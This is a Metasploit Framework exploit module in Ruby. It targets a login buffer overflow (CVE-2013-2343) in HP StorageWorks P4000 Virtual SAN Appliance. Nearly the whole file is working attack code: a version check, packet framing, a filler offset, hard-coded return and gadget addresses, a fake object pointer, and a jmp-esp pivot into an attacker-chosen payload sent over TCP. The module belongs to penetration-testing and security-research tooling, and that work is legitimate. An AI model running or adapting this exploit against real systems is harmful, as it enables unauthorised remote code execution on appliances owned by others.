GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/hp_vsa_login_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
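class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
        'Description' => %q{
          This module exploits a buffer overflow vulnerability found in HP's StorageWorks
          P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
          of the sscanf() function when parsing login requests. This module has been tested
          successfully on the HP VSA 9 Virtual Appliance.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2013-2343'],
          ['OSVDB', '94701'],
          ['ZDI', '13-179'],
          ['URL', 'http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318']
        ],
        'Payload' => {
          # '/' separates the fields of the login request and NUL would end the
          # string sscanf() parses; CR and LF are excluded as well. The same set
          # is applied to the overflow filler in #exploit.
          'BadChars' => "\x2f\x00\x0d\x0a",
          'Space' => 780,
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => ['linux'],
        'Arch' => ARCH_X86,
        'Targets' => [
          [
            'HP VSA 9',
            {
              'Version' => '9.0.0',
              'Offset' => 3446, # bytes of filler before the saved return address
              'Ret' => 0x0804EB34, # pop ebp # ret # from hydra
              'FakeObject' => 0x08072E58, # from hydra data
              'JmpEsp' => 0x08050CB8 # push esp # ret # from hydra
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2013-06-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ]
    )
  end

  # Send a benign login request carrying the target's version string and
  # classify the service from its reply.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the reply contains both
  #   "OK" and "Login", Detected when it contains both "FAILED" and
  #   "version", Safe otherwise (including no reply at all).
  def check
    begin
      connect
      packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
      vprint_status("#{rhost}:#{rport} Sending login packet to check...")
      sock.put(packet)
      res = sock.get_once
    ensure
      # Always release the socket, even if put/get_once raised.
      disconnect
    end

    # No data within the read timeout: nothing to classify.
    return Exploit::CheckCode::Safe unless res

    if res.include?('OK') && res.include?('Login')
      Exploit::CheckCode::Appears
    elsif res.include?('FAILED') && res.include?('version')
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Wrap +data+ in the framing the login service expects.
  #
  # The 32-byte header is eight big-endian 32-bit words; apart from the third
  # word (body length, including the trailing NUL) their meaning is not
  # documented here and they are reproduced as observed.
  #
  # @param data [String] request body such as "login:/..."; a NUL terminator
  #   is appended by this method
  # @return [String] binary (ASCII-8BIT) packet ready for +sock.put+
  def generate_packet(data)
    body = data.b # operate on raw bytes regardless of the caller's encoding

    # bytesize, not length: the body may carry multi-byte or binary content
    # and the peer counts bytes on the wire.
    pkt = [0, 1, body.bytesize + 1, 0, 0, 0, 0x14, 0xffffffff].pack('N8')
    pkt << body
    pkt << "\x00"
    pkt
  end

  # Send a single oversized login request: filler up to the saved return
  # address, a ROP-style pivot into the payload, then the payload itself.
  def exploit
    connect
    print_status("#{rhost}:#{rport} Sending login packet")

    # The filler is subject to the same bad bytes as the payload: a '/' would
    # end the field early and a NUL would end the string sscanf() reads, so the
    # overflow would never reach the saved return address. Pass them explicitly
    # rather than relying on the helper's default.
    my_bof = rand_text(target['Offset'], payload_badchars)
    my_bof << [target.ret].pack("V") # pop ebp # ret
    my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret
    my_bof << [target['JmpEsp']].pack("V") # push esp # ret -> lands on payload.encoded
    my_bof << payload.encoded

    # Fake version in order to ret asap
    packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ")
    sock.put(packet)
  ensure
    # disconnect tolerates a nil socket, so this is safe if connect raised.
    disconnect
  end
end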